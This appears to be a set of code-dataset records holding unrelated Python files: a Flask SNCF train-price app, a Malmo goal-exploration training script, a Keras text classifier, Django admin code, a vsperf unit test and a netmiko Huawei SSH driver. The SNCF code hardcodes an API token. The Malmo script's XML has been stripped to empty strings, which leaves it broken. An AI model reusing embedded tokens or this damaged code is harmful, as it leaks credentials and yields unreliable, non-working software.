http_rest=\"http://trouve-ton-train-rest.herokuapp.com/CalculPrix\"\r\n response = requests.get( http_rest, params = {'distance' : float(distance), 'devise' : devise })\r\n prixtrajet = response.json()\r\n \r\n departure=daydepart+\" \"+timedepart\r\n dt = datetime.strptime(departure, \"%Y-%m-%d %H:%M\")\r\n datetimesncf = convert_time(dt)\r\n \r\n nexttrain = Next_train(uic1,uic2,datetimesncf)\r\n\r\n return render_template(\"result.html\", town1=name1, town2=name2, result=round(distance,2), prix=round(prixtrajet['prix'],2), devise=devise, tableau=nexttrain)\r\n\r\ndef List_Gare() :\r\n page_initiale = page_gares(0)\r\n item_per_page = page_initiale.json()['pagination']['items_per_page']\r\n total_items = page_initiale.json()['pagination']['total_result']\r\n\r\n new_dict=dict()\r\n \r\n for page in range(int(total_items/item_per_page)+1) :\r\n stations_page = page_gares(page)\r\n \r\n ensemble_stations = stations_page.json()\r\n \r\n if 'stop_areas' not in ensemble_stations:\r\n # pas d'arrêt\r\n continue\r\n \r\n # on ne retient que les informations qui nous intéressent\r\n for station in ensemble_stations['stop_areas']:\r\n \r\n if 'administrative_regions' in station.keys() :\r\n #dfs.append(station['administrative_regions'][0]['name'])\r\n name = station['administrative_regions'][0]['name']\r\n uid = station['id']\t\r\n new_dict[name] = uid\r\n \r\n return(new_dict)\r\n \r\n \r\ndef page_gares(numero_page) :\r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n return requests.get(('https://api.sncf.com/v1/coverage/sncf/stop_areas?start_page={}').format(numero_page),auth=(token_auth, ''))\r\n \r\ndef Calcul_distance(town1,town2) :\r\n url_town1 = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town1+'\"'\r\n url_town2 = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town2+'\"'\r\n print(url_town2)\r\n api_town1 = requests.get(url_town1).json()\r\n api_town2 = requests.get(url_town2).json()\r\n print(api_town2)\r\n lat_town1 = api_town1['records'][0]['fields']['wgs_84'][0]\r\n long_town1 = api_town1['records'][0]['fields']['wgs_84'][1]\r\n \r\n lat_town2 = api_town2['records'][0]['fields']['wgs_84'][0]\r\n long_town2 = api_town2['records'][0]['fields']['wgs_84'][1]\r\n \r\n client = Client('https://trouve-ton-train-java-soap.herokuapp.com/services/TchouTchou?wsdl')\r\n result = client.service.calculDistance(long_town1, long_town2, lat_town1, lat_town2)\r\n return(result)\r\n \r\ndef Calcul_distance_uic(long_town1, long_town2, lat_town1, lat_town2) :\r\n client = Client('https://trouve-ton-train-java-soap.herokuapp.com/services/TchouTchou?wsdl')\r\n result = client.service.calculDistance(long_town1, long_town2, lat_town1, lat_town2)\r\n return(result)\r\n \r\ndef Get_UIC(town):\r\n url_town = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town+'\"'\r\n api_town = requests.get(url_town).json()\r\n UIC = api_town['records'][0]['fields']['pltf_uic_code']\r\n #uic = 'stop_area:OCE:SA:'+str(UIC)\r\n return(UIC) \r\n\r\ndef Next_train(UIC1,UIC2,datetimesncf) :\r\n\r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n payload = {'from': str(UIC1), 'to': str(UIC2), 'min_nb_journeys': 5, 'datetime': datetimesncf}\r\n api_get_train = requests.get('https://api.sncf.com/v1/coverage/sncf/journeys?', params=payload, auth=(token_auth, '')).json()\r\n\r\n tabdeparttrain = []\r\n if 'error' in api_get_train:\r\n tabdeparttrain.append(\"Aucun train trouvé ou disponible\")\r\n else:\r\n tabtrain = []\r\n n = len(api_get_train['journeys'])\r\n if n > 0:\r\n for i in range(0, n):\r\n tabtrain.append(api_get_train['journeys'][i]['departure_date_time'])\r\n \r\n u=0\r\n for train in tabtrain:\r\n u = u+1\r\n deptrain = convertir_str(train)\r\n tabdeparttrain.append(\"Train numero \"+str(u)+\", départ le: \"+str(deptrain))\r\n \r\n return(tabdeparttrain)\r\n\r\ndef convert_time(dt) :\r\n ''' on convertit en chaîne de caractères un datetime'''\r\n return datetime.strftime(dt, '%Y%m%dT%H%M%S')\r\n\r\ndef convertir_str(chaine) :\r\n ''' on convertit en date la chaine de caractères de l API'''\r\n return datetime.strptime(chaine.replace('T',''),'%Y%m%d%H%M%S')\r\n \r\n#app.run(debug='true')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27904489","text":"from __future__ import print_function\nfrom __future__ import division\nfrom builtins import range\nimport MalmoPython\nimport os\nimport os.path\nimport sys\nimport time\nimport json\nimport pickle\nimport time\nimport numpy as np\nfrom gep import GEP\nfrom nn_policy import Simple_NN\nimport matplotlib.pyplot as plt\nfrom plot_utils import *\nimport collections\nfrom collections import OrderedDict\nfrom gep_utils import *\nfrom malmo_controller import MalmoController\n\n\nif sys.version_info[0] == 2:\n sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) # flush print output immediately\nelse:\n import functools\n print = functools.partial(print, flush=True)\n\n\n\n\n############################# ENVIRONMENT INIT #####################################\ntick_lengths = 12\n #20 works\nskip_step = 1 #if = 0 then default 20 actions/sec\ndesired_mission_time = 7\ntotal_allowed_actions = 10 * desired_mission_time #dependent of skip_step, works if =1\n# if overclocking set display refresh rate to 1\nmod_setting = '' if tick_lengths >= 25 else \"true\"\n\nbread_positions = [[293.5,4,436.5],[289.5,4,437.5],[289.5,4,440.5],[291.5,6,442.5],[294.5,6,443.5]]\n\ndef draw_bread(): # place bread at given positions\n xml_string = \"\"\n for x,y,z in bread_positions:\n xml_string += '' % (int(x),int(y),int(z))\n xml_string += '\\n'\n return xml_string\n\ndef clean_bread(): # erase previous items in defined bread positions\n xml_string = \"\"\n for x,y,z in bread_positions:\n xml_string += '' % (int(x),int(y),int(z))\n return xml_string\n\nmissionXML='''\n \n \n \n Goal Exploration Process, in Malmo !\n \n\n \n ''' + str(tick_lengths) + '''\n ''' + mod_setting +'''\n \n \n \n \n clear\n \n \n \n \n \n \n \n \n\n ''' + clean_bread() + '''\n\n \n \n \n \n \n \n\n ''' + draw_bread() + '''\n\n \n \n \n \n \n \n FlowersBot\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 40\n 30\n \n \n\n \n '''\n\n#####################################################\n\ndef get_state(obs):\n breads = np.ones(len(bread_positions))\n for e in obs['entities']:\n if e['name'] == 'MinecartRideable':\n cart_x, cart_y, cart_z = e['x'], e['y'], e['z']\n cart_vx, cart_vy, cart_vz = e['motionX'], e['motionY'], e['motionZ']\n if e['name'] == 'FlowersBot':\n agent_x, agent_y, agent_z, agent_yaw = e['x'], e['y'], e['z'], (e['yaw'] % 360)\n agent_vx, agent_vy, agent_vz = e['motionX'], e['motionY'], e['motionZ']\n if e['name'] == 'bread':\n pos = [e['x'],e['y'],e['z']]\n bread_idx = bread_positions.index(pos) # current bread must be one of the positioned bread\n breads[bread_idx] = 0 #if bread is in arena it's not in our agent's pocket, so 0\n\n # ORDER MUST BE LIKE DEFINED INPUT_NAMES\n return np.array([agent_x, agent_y, agent_z, agent_vx, agent_vy, agent_vz, cart_x, cart_vx] + breads.tolist())\n\ndef get_outcome(state):\n s = state.tolist()\n # in case state and outcome are not ordered the same way\n # ORDER MUST BE LIKE DEFINED GET STATE TODO FIX\n return np.array(s[0:3] + [s[6]] + [sum(s[-len(bread_positions):])])\n\ndef save_gep(gep, iteration, book_keeping, savefile_name, book_keeping_name):\n with open(savefile_name, 'wb') as handle:\n pickle.dump([gep, iteration], handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(book_keeping_name, 'wb') as handle:\n pickle.dump(book_keeping, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\ndef load_gep(savefile_name, book_keeping_name):\n with open(savefile_name, 'rb') as handle:\n gep,starting_iteration = pickle.load(handle)\n with open(book_keeping_name, 'rb') as handle:\n b_k = pickle.load(handle)\n return gep, starting_iteration, b_k\n\ndef run_episode(policy_params):\n obs = malmo.start_mission()\n # Loop until mission/episode ends:\n state = -1\n for command_nb in range(total_allowed_actions):\n # extract the world state that will be given to the agent's policy\n state = get_state(obs)\n actions = param_policy.forward(state.reshape(1,-1), policy_params)\n # allowed to climb stairs only if at least 2 bread were recovered\n #print(state)\n #nb_bread_recovered = sum(state[-5:])\n #print('recov_b: %s' % nb_bread_recovered)\n #if state[1] >= 4.3 and nb_bread_recovered < 2:\n # print('access to stairs forbiddin, not enough dough pal')\n # #acions[0] = 0\n env_actions = [\"move \"+str(actions[0]), \"strafe \"+str(actions[1])]\n obs, done = malmo.step(env_actions)\n\n if command_nb == total_allowed_actions - 1: # end of episode\n #last cmd, must teleport to avoid weird glitch with minecart environment\n _, done = malmo.step([\"tp 293 7 433.5\"])\n # send final outcome\n outcome = get_outcome(state)\n break\n return outcome, state\n\n\n# evaluate model over given goals in [-1,1], returns errors for each sub space\ndef eval(agent_pos_goals, cart_x_goals, breads_goals):\n agent_goals_range = range(len(agent_pos_goals))\n cart_goals_range = range(len(agent_pos_goals),len(agent_pos_goals)+len(cart_x_goals))\n breads_goals_range = range(len(agent_pos_goals)+len(cart_x_goals),len(agent_pos_goals)+len(cart_x_goals)+len(breads_goals))\n all_goals = agent_pos_goals.tolist() + cart_x_goals.tolist() + breads_goals.tolist()\n #print(all_goals)\n agent_errors = []\n cart_errors = []\n breads_errors = []\n cart_touched = []\n\n for i,goal in enumerate(all_goals):\n print(\"########### Evaluation Iteration # %s ##########\" % (i))\n goal = np.array(goal)\n # generate exploitation policy using gep (NN exploitation)\n goal_range = None\n if i in agent_goals_range:\n #print('agent')\n goal_range = [0,1,2]\n elif i in cart_goals_range:\n #print('cart')\n goal_range = [3]\n elif i in breads_goals_range:\n #print('breads')\n goal_range = [4]\n else:\n raise NotImplementedError\n policy_params = gep.produce(normalized_goal=goal,goal_range=goal_range)\n outcome, _ = run_episode(policy_params)\n #print('result: %s' % outcome[goal_range])\n # normalize outcome\n outcome = scale_vector(outcome, np.array(full_outcome_bounds))\n\n #print('goal was {}'.format(unscale_vector(goal, np.array(full_outcome_bounds)[goal_range])))\n sub_outcome = outcome[goal_range]\n error = np.abs(sub_outcome - goal)\n\n # add error\n if i in agent_goals_range:\n agent_errors.append(np.sum(error) / 3.)\n elif i in cart_goals_range:\n cart_errors.append(error[0])\n #print(sub_outcome)\n if sub_outcome != scale_vector([291.5],np.array(b.get_bounds(['cart_x']))):\n #print('touched')\n cart_touched.append(1)\n else:\n #print('not touched')\n cart_touched.append(0)\n elif i in breads_goals_range:\n breads_errors.append(error[0])\n else:\n raise NotImplementedError\n return np.mean(agent_errors), np.mean(cart_errors), np.mean(breads_errors), cart_touched\n\n\n\n\n\n################################ MAIN #####################\n\n# define and parse argument values\n# more info here: https://stackoverflow.com/questions/5423381/checking-if-sys-argvx-is-defined\narg_names = ['command','experiment_name','model_type','nb_iters','nb_bootstrap','explo_noise','server_port','interest_step']\nargs = dict(zip(arg_names, sys.argv))\nArg_list = collections.namedtuple('Arg_list', arg_names)\nargs = Arg_list(*(args.get(arg, None) for arg in arg_names))\n\n\n# define variable's bounds for policy input and outcome \nb = Bounds()\nb.add('agent_x',[288.3,294.7])\nb.add('agent_y',[4,6])\nb.add('agent_z',[433.3,443.7])\nb.add('agent_vx',[-1,1]) \nb.add('agent_vy',[-1,1])\nb.add('agent_vz',[-1,1])\nb.add('cart_x',[285,297])\nb.add('cart_vx',[-1,1])\nfor i in range(len(bread_positions)):\n b.add('bread_'+str(i),[0,1])\n# add meta variable\nb.add('breads',[0,len(bread_positions)])\n\nprint(\"variable bounds :\")\nprint(b.bounds)\n\n################# INIT LEARNING AGENT #####################\n# full outcome space is [agent_x, agent_y, agent_z, cart_x, nb_bread_recovered]\n# possible models: [\"random_modular\", \"random_flat\", \"active_modular\",]\n\nexperiment_name = args.experiment_name if args.experiment_name else \"default\"\nsavefile_name = experiment_name+\"_save.pickle\"\nbook_keeping_file_name = experiment_name+\"_bk.pickle\"\nsave_step = 200\nplot_step = 100000\n#eval_step = 200\n\n# init neural network policy\ninput_names = ['agent_x','agent_y','agent_z','agent_vx','agent_vy','agent_vz',\n 'cart_x', 'cart_vx'] + ['bread_'+str(i) for i in range(len(bread_positions))]\ninput_bounds = b.get_bounds(input_names)\nprint('input_bounds: %s' % input_bounds) \nhidden_layer_size = 64\ninput_size = len(input_bounds)\naction_set_size = 2\nparam_policy = Simple_NN(input_size, input_bounds, action_set_size , hidden_layer_size)\n\n# init goal exploration process\nfull_outcome = ['agent_x','agent_y','agent_z','cart_x', 'breads']\nfull_outcome_bounds = b.get_bounds(full_outcome)\n\nexploration_noise = float(args.explo_noise) if args.explo_noise else 0.10\nnb_bootstrap = int(args.nb_bootstrap) if args.nb_bootstrap else 1000\nmodel_babbling_mode = \"random\"\ntotal_policy_params = hidden_layer_size*input_size + hidden_layer_size*action_set_size\n\nif args.model_type == \"random_flat\":\n outcome1 = full_outcome\n config = {'policy_nb_dims': total_policy_params,\n 'total_outcome_range': len(full_outcome) , #agent x y z pos, minecart x pos and number of recovered bread\n 'full_outcome_bounds': np.array(full_outcome_bounds),\n 'modules':{'mod1':{'outcome_bounds': np.array(b.get_bounds(outcome1)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome1])}}}\nelif (args.model_type == \"random_modular\") or (args.model_type == \"active_modular\"):\n outcome1 = ['agent_x','agent_y','agent_z']\n outcome2 = ['cart_x']\n outcome3 = ['breads']\n config = {'policy_nb_dims': total_policy_params,\n 'total_outcome_range': len(full_outcome) , #agent x y z pos, minecart x pos and number of recovered bread\n 'full_outcome_bounds': np.array(full_outcome_bounds),\n 'modules':{'agent_final_pos':{'outcome_bounds':np.array(b.get_bounds(outcome1)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome1])},\n 'cart_final_pos':{'outcome_bounds':np.array(b.get_bounds(outcome2)),\n 'outcome_range': np.array([full_outcome.index(var) for var in outcome2])},\n 'bread_final_count':{'outcome_bounds':np.array(b.get_bounds(outcome3)),\n 'outcome_range':np.array([full_outcome.index(var) for var in outcome3])}}}\n if args.model_type == \"active_modular\": model_babbling_mode =\"active\"\nelse:\n raise NotImplementedError\n\nmax_iterations = int(args.nb_iters) if args.nb_iters else 20000\n# if a gep save exist, load gep, init it otherwise\nif os.path.isfile(savefile_name):\n gep, starting_iteration, b_k = load_gep(savefile_name, book_keeping_file_name)\n nb_bootstrap = b_k['parameters']['nb_bootstrap']\n np.random.seed(b_k['parameters']['seed'])\n\nelse:\n starting_iteration = 0\n seed = np.random.randint(1000)\n np.random.seed(seed)\n if model_babbling_mode == \"active\":\n gep = GEP(config,\n model_babbling_mode=model_babbling_mode, \n explo_noise=exploration_noise, \n update_interest_step=int(args.interest_step))\n else:\n gep = GEP(config,model_babbling_mode=model_babbling_mode, explo_noise=exploration_noise)\n # init boring book keeping\n b_k = dict()\n b_k['parameters'] = {'model_type':args.model_type,\n 'nb_bootstrap': int(args.nb_bootstrap),\n 'seed': seed,\n 'explo_noise': exploration_noise}\n b_k['final_agent_x_reached'] = []\n b_k['final_agent_z_reached'] = []\n b_k['final_cart_x_reached'] = []\n b_k['final_bread_recovered'] = []\n b_k['choosen_modules'] = []\n b_k['interests'] = dict()\n for i in range(len(bread_positions)):\n b_k['bread_'+str(i)] = []\n #b_k['eval_errors'] = None\n\n# load test set goals\nif os.path.isfile('test_set_goals.pickle'):\n with open('test_set_goals.pickle', 'rb') as handle:\n agent_pos_goals, cart_x_goals, breads_goals = pickle.load(handle)\nelse:\n print(\"TEST SET NOT FOUND: run generate_random_goals script first\")\n#####################################################################\n\nport = int(args.server_port) if args.server_port else 10000\n# init malmo controller\nmalmo = MalmoController(missionXML, port=port, tick_lengths=8, skip_step=1, desired_mission_time=7)\n\nfor i in range(starting_iteration,max_iterations):\n print(\"########### Iteration # %s ##########\" % (i))\n # generate policy using gep\n policy_params = gep.produce(bootstrap=True) if i < nb_bootstrap else gep.produce()\n outcome, last_state = run_episode(policy_params)\n gep.perceive(outcome)\n\n # boring book keeping\n print(outcome[full_outcome.index('agent_x')])\n b_k['final_agent_x_reached'].append(outcome[full_outcome.index('agent_x')])\n b_k['final_agent_z_reached'].append(outcome[full_outcome.index('agent_z')])\n cart_x = outcome[full_outcome.index('cart_x')]\n b_k['final_cart_x_reached'].append(cart_x)\n #if (cart_x >= 296.2) or (cart_x <= 286.8):\n # print(\"KART WAS SWINGED UP CHAMPAIN %s\" % cart_x)\n # print(policy_params)\n # print(\"saving this AMAZING SET OF PARAMETERS, OMG THEY ARE SO GOOD\")\n # with open('policy_that_swinged_up_cart_'+str(i)+'.pickle', 'wb') as handle:\n # pickle.dump(policy_params, handle, protocol=pickle.HIGHEST_PROTOCOL)\n b_k['final_bread_recovered'].append(outcome[full_outcome.index('breads')])\n for k in range(len(bread_positions)):\n b_k['bread_'+str(k)].append(last_state[input_names.index('bread_'+str(k))])\n \n '''\n if ((i+1) % eval_step) == 0:\n e_agent, e_cart, e_breads = eval(agent_pos_goals, cart_x_goals, breads_goals)\n if b_k['eval_errors'] is None:\n b_k['eval_errors'] = [e_agent, e_cart, e_breads]\n else:\n b_k['eval_errors'][0] = np.hstack((b_k['eval_errors'][0],e_agent))\n b_k['eval_errors'][1] = np.hstack((b_k['eval_errors'][1],e_cart))\n b_k['eval_errors'][2] = np.hstack((b_k['eval_errors'][2],e_breads))\n '''\n if ((i+1) % save_step) == 0:\n print(\"saving gep\")\n b_k['choosen_modules'] = gep.choosen_modules\n if model_babbling_mode == \"active\":\n b_k['interests'] = gep.interests\n b_k['parameters']['update_interest_step'] = gep.modules['agent_final_pos'].update_interest_step\n save_gep(gep, i+1, b_k, savefile_name, book_keeping_file_name)\n \n if ((i+1) % plot_step) == 0:\n print(\"plotting\")\n #plot_agent_pos_exploration(1, b_k['final_agent_x_reached'], b_k['final_agent_z_reached'])\n #plot_agent_cart_exploration(2, b_k['final_cart_x_reached'])\n #plot_agent_bread_exploration(3, b_k['final_bread_recovered'])\n if model_babbling_mode == \"active\":\n plot_interests(5, gep.interests)\n #plot_eval_errors(4, b_k['eval_errors'])\n plt.show(block=False)\n \n# offline, in depth competence error evaluation\n# load random dataset of goals\n\nif os.path.isfile('test_set_goals.pickle'):\n with open('large_final_test_set_goals_bread_cart.pickle', 'rb') as handle:\n agent_pos_goals, cart_x_goals, breads_goals = pickle.load(handle)\nelse:\n print(\"TEST SET NOT FOUND: run generate_random_goals script first\")\n\nfirst_floor = scale_vector([4.],np.array(b.get_bounds(['agent_y'])))[0]\nsnd_floor = scale_vector([6.],np.array(b.get_bounds(['agent_y'])))[0]\nsnd_floor_limit = scale_vector([440.7],np.array(b.get_bounds(['agent_z'])))[0]\n# clean agent_pos_goals\nfor g in agent_pos_goals:\n print(g)\n if g[2] < snd_floor_limit:\n g[1] = first_floor\n else:\n g[1] = snd_floor\n print('after: %s' % g)\nprint(\"agent goals cleaned up\")\n\n'''\n# final competence test on goals choosen by engineer\nprint(np.array(full_outcome_bounds)[[0,1,2]])\nprint(np.array(full_outcome_bounds)[[3]])\nprint(np.array(full_outcome_bounds)[[4]])\n\nagent_pos_goals = scale_vector(np.array([[294.5,6.,443.5],[288.5,6.,443.5],[293.5,4.,436.3]]),\n np.array(full_outcome_bounds)[[0,1,2]])\ncart_x_goals = scale_vector(np.array([[296.5],[286.5],[294.5]]),\n np.array(full_outcome_bounds)[[3]])\nbreads_goals = scale_vector(np.array([[0.],[1.],[2.],[3.],[4.],[5.]]),\n np.array(full_outcome_bounds)[[4]])\n'''\n\ne_agent, e_cart, e_breads, cart_touched = eval(agent_pos_goals, cart_x_goals, breads_goals)\nb_k['final_eval_errors_bread_cart'] = [e_agent, e_cart, e_breads]\nb_k['final_eval_cart_touched'] = cart_touched\nb_k['hh'] = 'heelo'\nprint(\"saving gep\")\nsave_gep(gep, max_iterations, b_k, savefile_name, book_keeping_file_name)\n\nplt.show()\n","sub_path":"flowers_minecart_old_new.py","file_name":"flowers_minecart_old_new.py","file_ext":"py","file_size_in_byte":20162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312935545","text":"import pandas as pd\nimport numpy as np\nimport re\nimport sys\nimport jieba\n\ndef load_dataX(path):\n with open(path, 'r', encoding='utf-8') as f:\n readin = f.readlines()\n sentences = []\n for s in readin[1:]:\n s = re.sub('^[0-9]+,', '', s)\n s = s[:-2]\n for same_char in re.findall(r'((\\w)\\2{2,})', s):\n s = s.replace(same_char[0], same_char[1])\n for punct in re.findall(r'(><.-「」【】『』[-/\\\\\\\\()!\"+,&?\\']{2,})',s):\n s = s.replace(punct, punct[0])\n s = re.sub(\"[-「」【】『』] \",\"\",s)\n sentences.append(s)\n return sentences\n\ninputData = sys.argv[1]\ninputDictionary = sys.argv[2]\noutput = sys.argv[3]\njieba.set_dictionary(inputDictionary)\nfrom gensim.models import Word2Vec\nemb_model = Word2Vec.load('emb.model')\n\nsentencesT = load_dataX(inputData)\nsentencesT = [list(jieba.cut(s, cut_all=False)) for s in sentencesT]\nfrom keras.preprocessing.sequence import pad_sequences\ntest_sequences = []\nfor i, s in enumerate(sentencesT):\n toks = []\n for w in s:\n try:\n toks.append(emb_model.wv.vocab[w].index + 1)\n except:\n toks.append(0)\n test_sequences.append(toks)\nmax_length = 100\ntest_sequences = pad_sequences(test_sequences, maxlen=max_length)\n\nfrom keras.models import load_model\nmodel = load_model('./model.h5')\ntestY = model.predict(test_sequences)\ntestY[testY >= 0.5] = 1\ntestY[testY < 0.5] = 0\ntestY = np.reshape(testY, 80000)\ntestY = testY.astype(int)\nindex = [i for i in range(0,len(testY))]\noutCsv = pd.DataFrame({'id' : index, 'label' : testY})\noutCsv.to_csv(output, index=0)\n","sub_path":"hw4/hw4_test.py","file_name":"hw4_test.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"106892087","text":"from django.contrib import admin\nfrom django.core import serializers\nfrom django.http import HttpResponse\n\nfrom blogs.models import Blog, Entry, Author\n\n\nclass EntryAdmin(admin.ModelAdmin):\n list_display = ['headline', 'status']\n ordering = ['headline']\n actions = ['make_published', 'delete_selected']\n\n def make_published(self, request, queryset):\n rows_updated = queryset.update(status='p')\n if rows_updated == 1:\n message_bit = '1 entry was'\n else:\n message_bit = '%s entries were' % rows_updated\n self.message_user(request, '%s successfully published!' % message_bit)\n make_published.short_description = 'Publish the selected entries'\n\n\ndef export_selected_objects(modeladmin, request, queryset):\n response = HttpResponse(mimetype=\"text/javascript\")\n serializers.serialize(\"json\", queryset, stream=response)\n return response\n\nadmin.site.register(Blog)\nadmin.site.register(Entry, EntryAdmin)\nadmin.site.register(Author)\n\nadmin.site.add_action(export_selected_objects, 'export_selected')\n\n","sub_path":"part1_poll_site/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499687775","text":"#!/usr/bin/env python\n\n# Copyright 2016 Intel Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Unittest for yardstick.benchmark.scenarios.networking.vsperf.Vsperf\n\nfrom __future__ import absolute_import\ntry:\n from unittest import mock\nexcept ImportError:\n import mock\nimport unittest\n\nfrom yardstick.benchmark.scenarios.networking import vsperf\n\n\n@mock.patch('yardstick.benchmark.scenarios.networking.vsperf.subprocess')\n@mock.patch('yardstick.benchmark.scenarios.networking.vsperf.ssh')\n@mock.patch(\"yardstick.benchmark.scenarios.networking.vsperf.open\",\n mock.mock_open())\nclass VsperfTestCase(unittest.TestCase):\n\n def setUp(self):\n self.ctx = {\n \"host\": {\n \"ip\": \"10.229.47.137\",\n \"user\": \"ubuntu\",\n \"password\": \"ubuntu\",\n },\n }\n self.args = {\n 'options': {\n 'testname': 'p2p_rfc2544_continuous',\n 'traffic_type': 'continuous',\n 'frame_size': '64',\n 'bidirectional': 'True',\n 'iload': 100,\n 'trafficgen_port1': 'eth1',\n 'trafficgen_port2': 'eth3',\n 'external_bridge': 'br-ex',\n 'conf_file': 'vsperf-yardstick.conf',\n 'setup_script': 'setup_yardstick.sh',\n 'test_params': 'TRAFFICGEN_DURATION=30;',\n },\n 'sla': {\n 'metrics': 'throughput_rx_fps',\n 'throughput_rx_fps': 500000,\n 'action': 'monitor',\n }\n }\n\n def test_vsperf_setup(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n p.setup()\n self.assertIsNotNone(p.client)\n self.assertEqual(p.setup_done, True)\n\n def test_vsperf_teardown(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n p.setup()\n self.assertIsNotNone(p.client)\n self.assertEqual(p.setup_done, True)\n\n p.teardown()\n self.assertEqual(p.setup_done, False)\n\n def test_vsperf_run_ok(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_ssh.SSH.from_node().execute.return_value = (\n 0, 'throughput_rx_fps\\r\\n14797660.000\\r\\n', '')\n\n result = {}\n p.run(result)\n\n self.assertEqual(result['throughput_rx_fps'], '14797660.000')\n\n def test_vsperf_run_falied_vsperf_execution(self, mock_ssh,\n mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (1, '', '')\n\n result = {}\n self.assertRaises(RuntimeError, p.run, result)\n\n def test_vsperf_run_falied_csv_report(self, mock_ssh, mock_subprocess):\n p = vsperf.Vsperf(self.args, self.ctx)\n\n # setup() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_subprocess.call().execute.return_value = None\n\n # run() specific mocks\n mock_ssh.SSH.from_node().execute.return_value = (0, '', '')\n mock_ssh.SSH.from_node().execute.return_value = (1, '', '')\n\n result = {}\n self.assertRaises(RuntimeError, p.run, result)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/unit/benchmark/scenarios/networking/test_vsperf.py","file_name":"test_vsperf.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"640131716","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\nimport time\nfrom netmiko.cisco_base_connection import CiscoSSHConnection\n\n\nclass HuaweiSSH(CiscoSSHConnection):\n\n def session_preparation(self):\n \"\"\"Prepare the session after the connection has been established.\"\"\"\n self.set_base_prompt()\n self.disable_paging(command=\"screen-length 0 temporary\\n\")\n\n def config_mode(self, config_command='system-view'):\n \"\"\"Enter configuration mode.\"\"\"\n return super(HuaweiSSH, self).config_mode(config_command=config_command)\n\n def exit_config_mode(self, exit_config='return'):\n \"\"\"Exit configuration mode.\"\"\"\n return super(HuaweiSSH, self).exit_config_mode(exit_config=exit_config)\n\n def check_config_mode(self, check_string=']'):\n \"\"\"Checks whether in configuration mode. Returns a boolean.\"\"\"\n return super(HuaweiSSH, self).check_config_mode(check_string=check_string)\n\n def set_base_prompt(self, pri_prompt_terminator='>', alt_prompt_terminator=']',\n delay_factor=1):\n '''\n Sets self.base_prompt\n\n Used as delimiter for stripping of trailing prompt in output.\n\n Should be set to something that is general and applies in multiple contexts. For Comware\n this will be the router prompt with < > or [ ] stripped off.\n\n This will be set on logging in, but not when entering system-view\n '''\n debug = False\n if debug:\n print(\"In set_base_prompt\")\n\n delay_factor = self.select_delay_factor(delay_factor)\n self.clear_buffer()\n self.write_channel(\"\\n\")\n time.sleep(.5 * delay_factor)\n\n prompt = self.read_channel()\n prompt = self.normalize_linefeeds(prompt)\n\n # If multiple lines in the output take the last line\n prompt = prompt.split('\\n')[-1]\n prompt = prompt.strip()\n\n # Check that ends with a valid terminator character\n if not prompt[-1] in (pri_prompt_terminator, alt_prompt_terminator):\n raise ValueError(\"Router prompt not found: {0}\".format(prompt))\n\n # Strip off leading and trailing terminator\n prompt = prompt[1:-1]\n prompt = prompt.strip()\n\n self.base_prompt = prompt\n\n if debug:\n print(\"prompt: {}\".format(self.base_prompt))\n\n return self.base_prompt\n","sub_path":"netmiko/huawei/huawei_ssh.py","file_name":"huawei_ssh.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368297706","text":"import sys\nimport re\n\ntopology = [] # Raw topology information (with BW & Delay)\nneighbours = {} # Dictionary of list of neighbours for each switch\nswitch_cnt = 0 # Total number of switches in topology\nswitch_addr = {} # For active switches\nswitch_active = {} # Keep track if switch alive. 0 = alive, -5 = dead.\nswitch_msg = {} # Queue for messages to be sent to 